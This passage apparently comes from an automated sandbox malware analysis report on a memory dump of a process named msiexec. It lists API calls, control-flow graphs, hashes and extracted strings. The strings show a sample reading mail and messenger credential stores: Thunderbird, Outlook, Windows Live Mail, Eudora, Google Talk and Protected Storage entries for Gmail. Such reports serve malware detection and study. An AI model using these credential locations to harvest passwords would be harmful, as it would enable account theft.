                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                      • String ID: ACD
                                                                                                      • API String ID: 379999529-620537770
                                                                                                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                      • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$`{/h$current$nss3.dll$sqlite3.dll
                                                                                                      • API String ID: 3833278029-3653834404
                                                                                                      • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                      • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$`7<u
                                                                                                      • API String ID: 745651260-3672999695
                                                                                                      • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                      • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                      Strings
                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                      • API String ID: 1197458902-317895162
                                                                                                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                      • String ID: kv
                                                                                                      • API String ID: 3662548030-155876773
                                                                                                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                      Strings
                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                      • API String ID: 3203569119-2578778931
                                                                                                      • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                      • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2054149589-0
                                                                                                      • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                      • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 882979914-1578091866
                                                                                                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 348 410dbb-410dd2 call 410d0e 351 410dd4-410ddd call 4070ae 348->351 352 410dfd-410e1b memset 348->352 359 410ddf-410de2 351->359 360 410dee-410df1 351->360 353 410e27-410e35 352->353 354 410e1d-410e20 352->354 357 410e45-410e4f call 410a9c 353->357 354->353 356 410e22-410e25 354->356 356->353 361 410e37-410e40 356->361 367 410e51-410e76 call 410d3d call 410add 357->367 368 410e7f-410e92 _mbscpy 357->368 359->352 363 410de4-410de7 359->363 366 410df8 360->366 361->357 363->352 365 410de9-410dec 363->365 365->352 365->360 369 410e95-410e97 366->369 367->368 368->369
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$`{/h
                                                                                                      • API String ID: 119022999-1079026108
                                                                                                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 374 4085d2-408605 call 44b090 call 4082cd call 410a9c 381 4086d8-4086dd 374->381 382 40860b-40863d memset call 410b62 374->382 385 4086c7-4086cc 382->385 386 408642-40865a call 410a9c 385->386 387 4086d2 385->387 390 4086b1-4086c2 call 410b62 386->390 391 40865c-4086ab memset call 410add call 40848b 386->391 387->381 390->385 391->390
                                                                                                      APIs
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMulusermeWidestrlen$ComputerEnumUser
                                                                                                      • String ID: Software\Google\Google Talk\Accounts$`{/h
                                                                                                      • API String ID: 3996936265-2263978621
                                                                                                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3143880245-0
                                                                                                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 407 44b33b-44b342 408 44b344-44b34a ??3@YAXPAX@Z 407->408 409 44b34b-44b352 407->409 408->409 410 44b354-44b35a ??3@YAXPAX@Z 409->410 411 44b35b-44b362 409->411 410->411 412 44b364-44b36a ??3@YAXPAX@Z 411->412 413 44b36b-44b372 411->413 412->413 414 44b374-44b37a ??3@YAXPAX@Z 413->414 415 44b37b 413->415 414->415
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                                      APIs
                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                      • String ID: /stext
                                                                                                      • API String ID: 520177685-3817206916
                                                                                                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 145871493-0
